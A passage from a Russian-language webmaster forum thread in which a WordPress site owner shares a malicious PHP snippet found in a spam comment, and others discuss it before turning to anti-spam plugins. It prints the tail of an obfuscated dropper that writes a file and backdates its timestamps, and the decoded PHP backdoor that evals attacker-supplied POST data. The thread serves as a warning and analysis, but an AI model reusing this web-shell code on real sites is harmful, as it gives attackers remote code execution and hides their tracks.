ZlSEpdlTZStNlcYcdTGhicBvOgFcPDqcEq7o9vnsm/liFdKnCEM8DI8WXhUtwILoKFRG85QtZ9hvoHJDfDmLbb2zEw4ZZo7TZTqrI0dGY5BJYPWtOc5VgBZpmsgP8ZRZhr6NslRuhcnM7mogKrdZqNIf7+ULx6s5V6Cz1JRKXluyfR1gZdctA+0gN53dkfwRCMn5zA3ssS9NcsbjaK+/bGeftkeBxbcEAMUk6Y8687YWPb8v4lSZUcuLtnRDcijOPHf+R6Pk81c8mKXEPIgJkqwoj56IifCabKeQ/Dwtx58HzIMn+Gm/6ixKkCFxGjwQWGFgthfsO0rvRimq14L4AP4oNUm42E/uiMCbyyu1txOSxZtXwSNTvMO1d1JuzCHsVdjwr534ek0DFSSeQXkmNVMhLNMB1rr79KCJIAAIIgUYKX/u8/f//+/d//AQ=="))); ?>'; $mtime = filemtime(dirname($file)); $fh = fopen($file, 'w'); fwrite($fh, $src); fclose($fh); touch($file, $mtime, $mtime); touch(dirname($file), $mtime, $mtime);

 

А судя по некоторым строчкам, код помоему реально хотел открыть доступ к вашей админ панели, тем самым взломать ваш сайт

 

PS^ Весь я думаю переводить не стоит, хотя если хотите, пишите в ЛС

Скрипт серьезный или просто, какой-то школохацкер хотел взломать

Share this post


Link to post
Share on other sites
Guest werstey

то есть беспокоиться мне не нужно, у меня стоит галочка одобрять вручную комментарии, удалил полностью комментарий с коризы

Беспокоиться всегда нужно, проверьте нет ли дыр в плагинах которые стоят у вас и проверьте фильтрацию входящих параметров. Если Вы это делать не умеете, попросите это сделать своего хостера.    

Share this post


Link to post
Share on other sites
Guest werstey

Скрипт серьезный или просто, какой-то школохацкер хотел взломать

Скрипт нормальный, а школохацкер или нешколохацкер это только ему известно.

Share this post


Link to post
Share on other sites

Кстати, внутри абракадабра расшифровывается как (Упаковано 28 раз base64_decode)

@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;

Share this post


Link to post
Share on other sites

Лично отказался от WP-комментариев и Вам советую. Не хватает временивремени и терпения удалять кучу спам-комментов.

Share this post


Link to post
Share on other sites

Лично отказался от WP-комментариев и Вам советую. Не хватает временивремени и терпения удалять кучу спам-комментов.

Скажите как вы отключили? Удалили код из comments.php

Share this post


Link to post
Share on other sites

Лично отказался от WP-комментариев и Вам советую. Не хватает временивремени и терпения удалять кучу спам-комментов.

Кстати, эта проблема решается очень просто. Не нужны никакие каптчи, ни щепетильные настройки...

 

Дело в том, что поля у Вордпресса имеют стандартные имена и куча ботов нацелены на их заполнение. Стоит появится сайту в поисковой выдаче, спам-боты практически сразу заносят его с свой список.

 

Достаточно установить плагин "BotBlocker" (можно не заморачиваться с его настройками, а просто активировать) и спам как рукой снимет! Плагин как раз меняет имена полей для заполнения: живому человеку не заметно, а робот не пройдет.

Share this post


Link to post
Share on other sites

Кстати, эта проблема решается очень просто. Не нужны никакие каптчи, ни щепетильные настройки...

 

Дело в том, что поля у Вордпресса имеют стандартные имена и куча ботов нацелены на их заполнение. Стоит появится сайту в поисковой выдаче, спам-боты практически сразу заносят его с свой список.

 

Достаточно установить плагин "BotBlocker" (можно не заморачиваться с его настройками, а просто активировать) и спам как рукой снимет! Плагин как раз меняет имена полей для заполнения: живому человеку не заметно, а робот не пройдет.

 

Или как вариант, плагин Akisment, у меня стоит, спам хорошо фильтрует, а удаляются в два клика все.

Share this post


Link to post
Share on other sites

Лично отказался от WP-комментариев и Вам советую. Не хватает временивремени и терпения удалять кучу спам-комментов.

Просто вы не в курсе плагина, который блокирует весь мусор.  И не нужно советовать того, в чем сами не сильны :)

Share this post


Link to post
Share on other sites

 

 


Просто вы не в курсе плагина, который блокирует весь мусор. И не нужно советовать того, в чем сами не сильны

Не всегда. Акисмет не зря идет в базовой комплектации, но есть сайты, когда коменты вообще не нужны, ибо ими не пользуются целевые посетители

Share this post


Link to post
Share on other sites

Не поверите, но призаходе на эту страницу мой антивирус закричал "ОБНАРУЖЕНА ВИРУСНАЯ УГРОЗА". 

 

САМ НЕ ОЖИДАЛ, ЖОВАНЫЙ КОТ, аж дёрнулся! Кроме шуток....  :ph34r:

Share this post


Link to post
Share on other sites

Не всегда. Акисмет не зря идет в базовой комплектации, но есть сайты, когда коменты вообще не нужны, ибо ими не пользуются целевые посетители

Я про Акисмет ни слова не сказал. Видимо вы тоже не очень разбираетесь в WordPress, без обид, но сообщение было адресовано не вам.

Share this post


Link to post
Share on other sites

случайно данную тему открыл, антивирус как заругается - удалите нафиг эту тему))

Share this post


Link to post
Share on other sites

Лично отказался от WP-комментариев и Вам советую. Не хватает временивремени и терпения удалять кучу спам-комментов.

Почему бы Вам плагин каптчи не попробовать. у меня весь спам исчез

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...